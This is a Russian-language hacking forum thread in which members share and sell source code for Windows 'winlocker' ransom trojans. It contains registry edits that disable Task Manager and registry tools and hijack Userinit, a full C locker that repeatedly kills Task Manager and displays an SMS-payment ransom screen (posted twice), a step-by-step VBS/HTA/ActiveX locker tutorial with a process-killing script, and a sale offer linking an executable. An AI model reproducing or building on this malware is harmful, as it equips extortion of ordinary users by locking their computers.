Исходники Троянов, блокирующих систему Windows
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Исходники Троянов, блокирующих систему Windows - 2011-01-01 22:51:48.983333
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
Всем доброго времени суток! Я думаю, что каждый ,когда нибудь, встречался с троянами, блокирующими систему Windows. На данном форуме я предлагаю всем желающим выкладывать исходники таких вирусов. За одно сможем сами получше освоить и понять принцип написания таких "монстров" и других научить это делать!:)
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-02 23:27:42.940000
|
|
|
[The]
Сообщений: 30
Оценки: 0
Присоединился: 2010-12-26 17:46:15.306666
|
Можно узнать, что такое криптованый исходник?
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-03 09:29:22.396666
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
quote:
[The] Извиняюсь , я описался)));)
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-01-06 12:07:55.243333
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
manishka122 Я Турбо Паскаль учу))) Скоро си++ начну))) В инете я уже обыскался, нет исходников таких, если знаешь где посмотреть хотя бы 1 такой, то подскажи , написав мне в личку))) Буду очень благодарен! А так то я с вами полностью согласен!;)
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-05-07 15:49:42.050000
|
|
|
m0nstr
Сообщений: 58
Оценки: 0
Присоединился: 2010-08-30 19:11:36.590000
|
Исходником очень много, только их продают =) погуглите, за 300 р гдето видел недавно
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-05-08 16:59:04.690000
|
|
|
xBuRoGoZx
Сообщений: 9
Оценки: 0
Присоединился: 2011-05-08 16:15:25.666666
|
Никто тебе не выложит в открытом доступе. Они есть, спору нет. Но они: на закрытых сайтах, где регистрация по приглашениям; платные; с ошибками. Представь хотя бы на секунду, что было бы, если бы исходники без ошибок, бесплатные и лежат на популярных общественных ресурсах. Это же будет апокалипсис. Ламеры будут все крушить и ломать. Даже те же самые инструкции по написанию бат-файлов в примерах вирусов содержат ошибки: где то / вместо \, где то % не написан, где то вместо О написана О (кириллицей)… Все опять таки от ламеров…
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-05-08 17:04:22.030000
|
|
|
xBuRoGoZx
Сообщений: 9
Оценки: 0
Присоединился: 2011-05-08 16:15:25.666666
|
Никто тебе не выложит в открытом доступе. Они есть, спору нет. Но они: на закрытых сайтах, где регистрация по приглашениям; платные; с ошибками. Представь хотя бы на секунду, что было бы, если бы исходники без ошибок, бесплатные и лежат на популярных общественных ресурсах. Это же будет апокалипсис. Ламеры будут все крушить и ломать. Даже те же самые инструкции по написанию бат-файлов в примерах вирусов содержат ошибки: где то / вместо \, где то % не написан, где то вместо О написана О (кириллицей)… Все опять таки против ламеров… В принципе я себя считаю ламером. Но если бы мне попались исходники без ошибок и бесплатные, я бы не стал ничего крушить. А стал бы их изучать. Так что если хоть кто то имеет исходники.. Ну или хотя бы часть небольшую, напишите мне в ПМ. Очень интересно и хочу по изучать их. Заранее благодарен.
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 10:25:54.820000
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
quote:
Но если бы мне попались исходники без ошибок и бесплатные, я бы не стал ничего крушить. А стал бы их изучать. Молодой человек, я с вами полностью согласен. Вот именно по этой самой причине я и создавал этот форум. Не для того чтобы рушить , а для того чтобы изучать исходники подобных , можно сказать даже очень редких вирусов.
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 12:51:52.596666
|
|
|
ZiMMy
Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
|
quote:
ORIGINAL: Scorpik можно сказать даже очень редких вирусов. Я бы так не сказал.
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 13:53:30.240000
|
|
|
KwanzaBot
Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
|
Нужен просто винлокер или еще чтоб он как троян работал? Если просто winlock могу поделится сорцом собственного производства.
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-14 22:14:32.680000
|
|
|
ololo__schoolboy
Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
|
Примитивный винлок будет примерно так устроен: [Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000001 чтоб не редактировался реестор [Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr"=dword:00000001 чтоб диспетчер задач был заблокирован администратором [Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "NoRealMode"=dword:00000001 чтоб не грузился в дос режиме [Software\Microsoft\Windows\CurrentVersion\CurrentVersion\Winlogon] "Userinit"="наш винлок" чтоб грузился вместо юзер инит KwanzaBot, делись, интересно
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 09:35:09.870000
|
|
|
KwanzaBot
Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
|
Только в нём нету добавления в автозагрузку, и всё построено на костылях, но может кому пригодится) И за корявый код простите, я где-то в 13-14 лет это писал.
#include "windows.h"
#pragma comment(lib, "Gdi32.lib")
#define IDB_BUTTON 200
#define IDB_EDIT 201
#define IDB_STATIC 202
int RegClass(WNDPROC Proc, LPCTSTR szName);
LRESULT CALLBACK _export WndProc(HWND, UINT, WPARAM, LPARAM);
HINSTANCE hInstance;
HWND hEdit;
HWND hwnd;
void WinNull(int type)
{
HKEY lKey;
//const char *zData = "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00";
BYTE zData[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0xE0, 0x00, 0x00, 0x5C, 0xE0, 0x00, 0x00, 0x00, 0x00};
RegOpenKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Keyboard Layout", &lKey);
if(type==1){
RegSetValueEx(lKey, "Scancode Map", 0, REG_BINARY, (LPBYTE)zData, sizeof(zData));
}else{
}
RegCloseKey(lKey);
}
void SwitchNull(int type)
{
const char *pData = "0";
const char *eData = "1";
HKEY hKey;
RegOpenKey(HKEY_CURRENT_USER, "Control Panel\\Desktop", &hKey);
if(type==0){
RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)pData, sizeof(pData));
}else{
RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)eData, sizeof(pData));
}
RegCloseKey(hKey);
}
DWORD WINAPI ThreadFunc(PVOID pParam)
{
DWORD dwResult = 0;
while(1){
WinExec("taskkill /f /im taskmgr.exe", SW_HIDE);
Sleep(60);}
return dwResult;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
MSG msg;
if(!RegClass(WndProc, "AppClass")) return FALSE;
hwnd = CreateWindow("AppClass", "Ваш компьютер заблокирован", WS_MAXIMIZEBOX|WS_POPUP |WS_VISIBLE,
CW_USEDEFAULT, CW_USEDEFAULT, 1280, 1024, NULL, NULL, hInstance, NULL);
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (int) msg.wParam;
}
int RegClass(WNDPROC Proc, LPCTSTR szName)
{
WNDCLASS wc;
wc.style = CS_HREDRAW | CS_VREDRAW;
wc.cbClsExtra = wc.cbWndExtra = 0;
wc.lpfnWndProc = Proc;
wc.hInstance = hInstance;
wc.hIcon = LoadIcon(NULL, IDI_APPLICATION);
wc.hCursor= LoadCursor(NULL, IDC_ARROW);
wc.hbrBackground = (HBRUSH)(COLOR_BACKGROUND + 2);
wc.lpszMenuName = (LPCTSTR)NULL;
wc.lpszClassName = szName;
return RegisterClass(&wc);
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
HWND hButton;
HWND hStatic;
switch(message)
{
case WM_CREATE:
{
//Logged();
//WinNull(1);
//SwitchNull(0);
HANDLE hThread = CreateThread(NULL, 0, &ThreadFunc, 0, 0, NULL);
hButton = CreateWindow("BUTTON","ОК", WS_CHILD|WS_VISIBLE,
790,500,70,25,hWnd,(HMENU)IDB_BUTTON,hInstance,NULL);
hEdit = CreateWindow("EDIT", NULL, WS_CHILD|WS_VISIBLE|WS_BORDER,
485,503,300,20,hWnd,(HMENU)IDB_EDIT,hInstance,NULL);
hStatic = CreateWindow("STATIC",
"Ваш компьютер заблокирован, для разблокировки пошлите sms с текстом бла бла на номер 0000 и введите полученный код в окно активации.",
WS_CHILD|WS_VISIBLE, 485,445,375,51,hWnd,(HMENU)IDB_STATIC,hInstance,NULL);
return 0;
break;
}
case WM_COMMAND:
{
switch(LOWORD(wParam))
{
case IDB_BUTTON:{
char word[256];
GetWindowText(hEdit,word,512);
if(strcmp(word, "выход")==0){ SwitchNull(1); PostQuitMessage(0);}
if(strcmp(word, "0000")==0) MessageBox(hwnd, "Простите, произошла ошибка сервиса, \nполучите пароль активации ещё раз.", "Ошибка!", MB_OK);
}
}
break;
}
case WM_CLOSE:{
if((GetKeyState(VK_MENU) >> 8) && (GetKeyState(VK_F4) >> 8)) return 0;
break;
}
case WM_PAINT:{
char psend[29] = "Ваш компьютер заблокирован!";
static PAINTSTRUCT ps;
HDC hdc = BeginPaint(hwnd, &ps);
LOGFONT f;
f.lfCharSet = DEFAULT_CHARSET;
f.lfPitchAndFamily = DEFAULT_PITCH;
strcpy(f.lfFaceName, "Times New Roman");
f.lfHeight = 50;
f.lfWeight = FW_BOLD;
f.lfEscapement = 0;
f.lfStrikeOut = 0;
HFONT fOn = CreateFontIndirect(&f);
HFONT fAn = (HFONT)SelectObject(hdc, fOn);
SetTextColor(hdc, RGB(255, 255, 255));
SetBkColor(hdc, RGB(39, 90, 255));
SetTextAlign(hdc, TA_LEFT | TA_TOP);
TextOut(hdc, 20, 20, psend, strlen(psend));
break;
}
case WM_DESTROY:{PostQuitMessage(0); return 0;}}
return DefWindowProc(hWnd, message, wParam, lParam);
}
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 14:26:05.566666
|
|
|
ololo__schoolboy
Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
|
Изменяюсь за оффтоп, но все же не могу не спросить, вы перешли на си из javascript ?
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 16:00:59.133333
|
|
|
KwanzaBot
Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
|
ololo__schoolboy, подозрительные вопрос 8| jаvаsсript'ом ни когда не увлекался, а что?
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-15 19:56:20.776666
|
|
|
ololo__schoolboy
Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
|
просто такая:if(...){
...
}else{
...
}
нотация почти ни где не используется кроме javascript и java (насчет последнего не знаю)
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-20 14:18:46.550000
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
KwanzaBot, а у тебя нет winlockа, написанного на паскале или делфи? И выложенный тобою исходник, как я помимаю, написан на си++ ? quote:
#include "windows.h" #pragma comment(lib, "Gdi32.lib") #define IDB_BUTTON 200 #define IDB_EDIT 201 #define IDB_STATIC 202 int RegClass(WNDPROC Proc, LPCTSTR szName); LRESULT CALLBACK _export WndProc(HWND, UINT, WPARAM, LPARAM); HINSTANCE hInstance; HWND hEdit; HWND hwnd; void WinNull(int type) { HKEY lKey; //const char *zData = "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00"; BYTE zData[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5B, 0xE0, 0x00, 0x00, 0x5C, 0xE0, 0x00, 0x00, 0x00, 0x00}; RegOpenKey(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Keyboard Layout", &lKey); if(type==1){ RegSetValueEx(lKey, "Scancode Map", 0, REG_BINARY, (LPBYTE)zData, sizeof(zData)); }else{ } RegCloseKey(lKey); } void SwitchNull(int type) { const char *pData = "0"; const char *eData = "1"; HKEY hKey; RegOpenKey(HKEY_CURRENT_USER, "Control Panel\\Desktop", &hKey); if(type==0){ RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)pData, sizeof(pData)); }else{ RegSetValueEx(hKey, "CoolSwitch", 0, REG_SZ, (LPBYTE)eData, sizeof(pData)); } RegCloseKey(hKey); } DWORD WINAPI ThreadFunc(PVOID pParam) { DWORD dwResult = 0; while(1){ WinExec("taskkill /f /im taskmgr.exe", SW_HIDE); Sleep(60);} return dwResult; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MSG msg; if(!RegClass(WndProc, "AppClass")) return FALSE; hwnd = CreateWindow("AppClass", "Ваш компьютер заблокирован", WS_MAXIMIZEBOX|WS_POPUP |WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 1280, 1024, NULL, NULL, hInstance, NULL); while (GetMessage(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return (int) msg.wParam; } int RegClass(WNDPROC Proc, LPCTSTR szName) { WNDCLASS wc; wc.style = CS_HREDRAW | CS_VREDRAW; wc.cbClsExtra = wc.cbWndExtra = 0; wc.lpfnWndProc = Proc; wc.hInstance = hInstance; wc.hIcon = LoadIcon(NULL, IDI_APPLICATION); wc.hCursor= LoadCursor(NULL, IDC_ARROW); wc.hbrBackground = (HBRUSH)(COLOR_BACKGROUND + 2); wc.lpszMenuName = (LPCTSTR)NULL; wc.lpszClassName = szName; return RegisterClass(&wc); } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { HWND hButton; HWND hStatic; switch(message) { case WM_CREATE: { //Logged(); //WinNull(1); //SwitchNull(0); HANDLE hThread = CreateThread(NULL, 0, &ThreadFunc, 0, 0, NULL); hButton = CreateWindow("BUTTON","ОК", WS_CHILD|WS_VISIBLE, 790,500,70,25,hWnd,(HMENU)IDB_BUTTON,hInstance,NULL); hEdit = CreateWindow("EDIT", NULL, WS_CHILD|WS_VISIBLE|WS_BORDER, 485,503,300,20,hWnd,(HMENU)IDB_EDIT,hInstance,NULL); hStatic = CreateWindow("STATIC", "Ваш компьютер заблокирован, для разблокировки пошлите sms с текстом бла бла на номер 0000 и введите полученный код в окно активации.", WS_CHILD|WS_VISIBLE, 485,445,375,51,hWnd,(HMENU)IDB_STATIC,hInstance,NULL); return 0; break; } case WM_COMMAND: { switch(LOWORD(wParam)) { case IDB_BUTTON:{ char word[256]; GetWindowText(hEdit,word,512); if(strcmp(word, "выход")==0){ SwitchNull(1); PostQuitMessage(0);} if(strcmp(word, "0000")==0) MessageBox(hwnd, "Простите, произошла ошибка сервиса, \nполучите пароль активации ещё раз.", "Ошибка!", MB_OK); } } break; } case WM_CLOSE:{ if((GetKeyState(VK_MENU) >> 8) && (GetKeyState(VK_F4) >> 8)) return 0; break; } case WM_PAINT:{ char psend[29] = "Ваш компьютер заблокирован!"; static PAINTSTRUCT ps; HDC hdc = BeginPaint(hwnd, &ps); LOGFONT f; f.lfCharSet = DEFAULT_CHARSET; f.lfPitchAndFamily = DEFAULT_PITCH; strcpy(f.lfFaceName, "Times New Roman"); f.lfHeight = 50; f.lfWeight = FW_BOLD; f.lfEscapement = 0; f.lfStrikeOut = 0; HFONT fOn = CreateFontIndirect(&f); HFONT fAn = (HFONT)SelectObject(hdc, fOn); SetTextColor(hdc, RGB(255, 255, 255)); SetBkColor(hdc, RGB(39, 90, 255)); SetTextAlign(hdc, TA_LEFT | TA_TOP); TextOut(hdc, 20, 20, psend, strlen(psend)); break; } case WM_DESTROY:{PostQuitMessage(0); return 0;}} return DefWindowProc(hWnd, message, wParam, lParam); }
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-20 21:00:52.413333
|
|
|
KwanzaBot
Сообщений: 129
Оценки: 0
Присоединился: 2011-04-18 19:45:33.773333
|
Да нет, вроде как на Си.
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2011-08-24 11:46:54.186666
|
|
|
Scorpik
Сообщений: 113
Оценки: 0
Присоединился: 2011-01-01 22:33:00.310000
|
В этой статье я расскажу, как написать простенький локер, что называется, на коленке. Наш локер будет состоять из 3-х файлов: 1. VBS-скрипта для убийства процессов. 2. Библиотеки для установки позиции окна HTML-приложения поверх всех окон. 3. HTML-приложения для растяжки во весь экран. Ready - Steady - Go Начнем с киллера процессов. Открываем блокнот. Я использую Notepad++. Пишем простенький код: Dim objWMI, colMonitoredProcesses, objLatestProcess Set objWMI = GetObject("winmgmts:\\.\Root\CIMV2") Set colMonitoredProcesses = objWMI.ExecNotificationQuery("SELECT * FROM __InstanceCreationEvent " _ & "WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'") Do Set objLatestProcess = colMonitoredProcesses.NextEvent objLatestProcess.TargetInstance.Terminate() Loop Set objLatestProcess = Nothing Set colMonitoredProcesses = Nothing Сохраняем с расширением VBS. Скрипт каждую секунду мониторит появление процессов и убивает свежие. Можете попробовать запустить. Предварительно рекомендую запустить диспетчер задач, для того, чтобы благополучно убить процесс wsсriрt.exe. После запуска скрипта запустить дистпетчер задач не получится. Становится понятно для чего он нам нужен :). Продолжаем. Зачем нам понадобилось писать библиотеку? Из VBS получить дескриптор окна не реально, а он нам очень нужен для того, чтобы установить позицию окна поверх всех окон, поэтому создадим так называемый Wrapper - библиотеку, которая поможет нам использовать API-функции из скрипта. Для получения хэндла используем функцию FindWindow из библиотеки user32.dll, для установки позиции окна поверх всех - функцию SetWindowPos, а для запрета использования клавиатурного сочетания Alt+F4 - функцию RegisterHotKey из той же библиотеки. Открываем IDE VB6, создаем проект ActiveX DLL, называем проект WinLocker, класс - WLClass, пишем несложный код: Option Explicit 'API-функция получения дескриптора окна Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _ (ByVal lpszClassName As String, ByVal lpszWindow As String) As **** 'API-функция установки позиции окна Private Declare Function SetWindowPos Lib "user32" _ (ByVal hWnd As ****, ByVal hWndInsertAfter As ****, ByVal x As ****, _ ByVal y As ****, ByVal cx As ****, ByVal cy As ****, ByVal wFlags As ****) As **** 'API-функция определения горячих кнопок Private Declare Function RegisterHotKey Lib "user32" _ (ByVal hWnd As ****, ByVal id As ****, ByVal fsModifiers As ****, _ ByVal vk As ****) As **** 'получаем дескриптор Public Function GetHandle(ByVal strCaption As String) As **** GetHandle = FindWindow(vbNullString, strCaption) End Function 'устанавливаем окно поверх всех Public Sub SetTop(ByVal strCaption As String) SetWindowPos FindWindow(vbNullString, strCaption), -1, 0, 0, 0, 0, 3 End Sub 'запрещаем использование Alt+F4 Public Sub DenyAltF4(ByVal strCaption As String) RegisterHotKey FindWindow(vbNullString, strCaption), 99, 1, &H73 End Sub Комплируем DLL. Библиотека готова к использованию. Завершаем. Пишем HTA. Открываем блокнот. Пишем код: <html> <head> <title>VBSWinlocker</title> <HTA:APPLICATION ID="VBSWinlocker" APPLICATIONNAME="VBSWinlocker" SINGLEINSTANCE="yes" showInTaskbar ="no" BORDER="none" SCROLL="no" Version = "1.0" /> <style type="text/css"> body{ color:#fff; font: bold sans-serif; } #center{ position: absolute; left: 42%; top: 48%; } .button{ font: bold; color:#fff; background-color:000055; } </style> </head> <sсriрt language="VBScript"> Const strDll = "WinLocker.dll" 'библиотека Const strWLProsMon = "WLProcKiller.vbs" 'киллер процессов Const strInputVal = "12345" 'код разблокировки 'процедура изменения размера главного окна при загрузке Sub Window_OnLoad() Window.MoveTo 0, 0 Window.ResizeTo screen.availWidth, screen.availHeight 'чтобы при любом раскладе загрузился интерфейс Window.setTimeout "SetTopPos",1, "vbsсriрt" End Sub Sub SetTopPos() Set wshShell = CreateObject("WScript.Shell") 'пытаемся зарегистрировать библиотеку ret = wshShell.Run("regsvr32.exe /i /s " & strDll & ",0,True") 'проверяем успех регистрации If ret <> 0 Then 'если не удалось зарегистрировать wshShell.PopUp ,1,"Не удалось зарегистрировать библиотеку " & strDll ,16 Set wshShell = Nothing Window.Close End If 'запускаем киллера процессов ret = wshShell.Run("wsсriрt.exe " & strWLProsMon) 'проверяем успех запуска киллера If ret <> 0 Then 'если не удалось запустить скрипт мониторинга wshShell.PopUp ,1,"Не удалось запустить " & strWLProsMon,16 Set wshShell = Nothing Window.Close End If Set wshShell = Nothing 'создаем экземпляр класса из либы = strDll Set objDASetTop = CreateObject("WinLocker.WLClass") 'делаем окно поверх всех окон objDASetTop.SetTop document.title 'запрещаем нажатие Alt+F4 objDASetTop.DenyAltF4 document.title 'удаляем ссылку Set objDASetTop = Nothing End Sub 'останавливаем киллера процессов Sub StopMon() Dim objWMI, colProcess, objProcess Set objWMI = GetObject("winmgmts:\\.\Root\CIMV2") 'ищем процесс мониторинга Set colProcess = objWMI.ExecQuery("Select * from Win32_Process Where Name ='wsсriрt.exe' And CommandLine Like '%" & _ strWLProsMon & "%'") For Each objProcess in colProcess 'побежали по полученным процессам objProcess.Terminate 'убиваем процесс Next Set objWMI = Nothing End Sub 'проверка значения Sub CheckInputVal() If txtPW.Value = strInputVal Then StopMon 'останавливаем мониторинг процессов Window.Close 'закрываем приложение End If End Sub </sсriрt> <!– Подключаем таблицы стилей –> <!– <link href="usbmaster.css" rel="stylesheet" type="text/css" media="screen" /> –> <!– Рисуем нарядную градиентную заливку :) –> <body STYLE="filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=1, StartColorStr='#000066', EndColorStr='#0000FF')"> <div id="center"> <input type="password" id="txtPW"> <input type="button" class="button" value="ввод" onclick="CheckInputVal"> <br/> Код: 12345 </div> </body> </html> Не трудно догадаться, что: SINGLEINSTANCE="yes" - запрещает одновременный запуск одноименных HTA showInTaskbar="no" - запрещает отображение приложения в панели задач BORDER="none" - убирает границу окна приложения SCROLL="no" - убирает скролл Сохраняем файл с расширением HTA. Наш локер готов. Что получилось можно скачать здесь. PS: Не пытайтесь "допиливать" полученый код с целью противозаконного использования :). Респект Автору dab00 !!!
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2012-04-02 11:03:42.813333
|
|
|
Rammsteinik
Сообщений: 12
Оценки: 0
Присоединился: 2012-03-17 21:29:42.676666
|
продам исходники винлока. вот пример http://lost4.ucoz.ru/WinLock.exe
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2012-04-02 11:05:54.710000
|
|
|
Rammsteinik
Сообщений: 12
Оценки: 0
Присоединился: 2012-03-17 21:29:42.676666
|
продам исходники винлока. вот пример http://lost4.ucoz.ru/WinLock.exe
|
|
|
RE: Исходники Троянов, блокирующих систему Windows - 2012-04-02 21:03:48.720000
|
|
|
shkolote attake
Сообщений: 268
Оценки: 0
Присоединился: 2010-10-19 05:37:44.873333
|
а что за массив байт?
|
|
|
|
|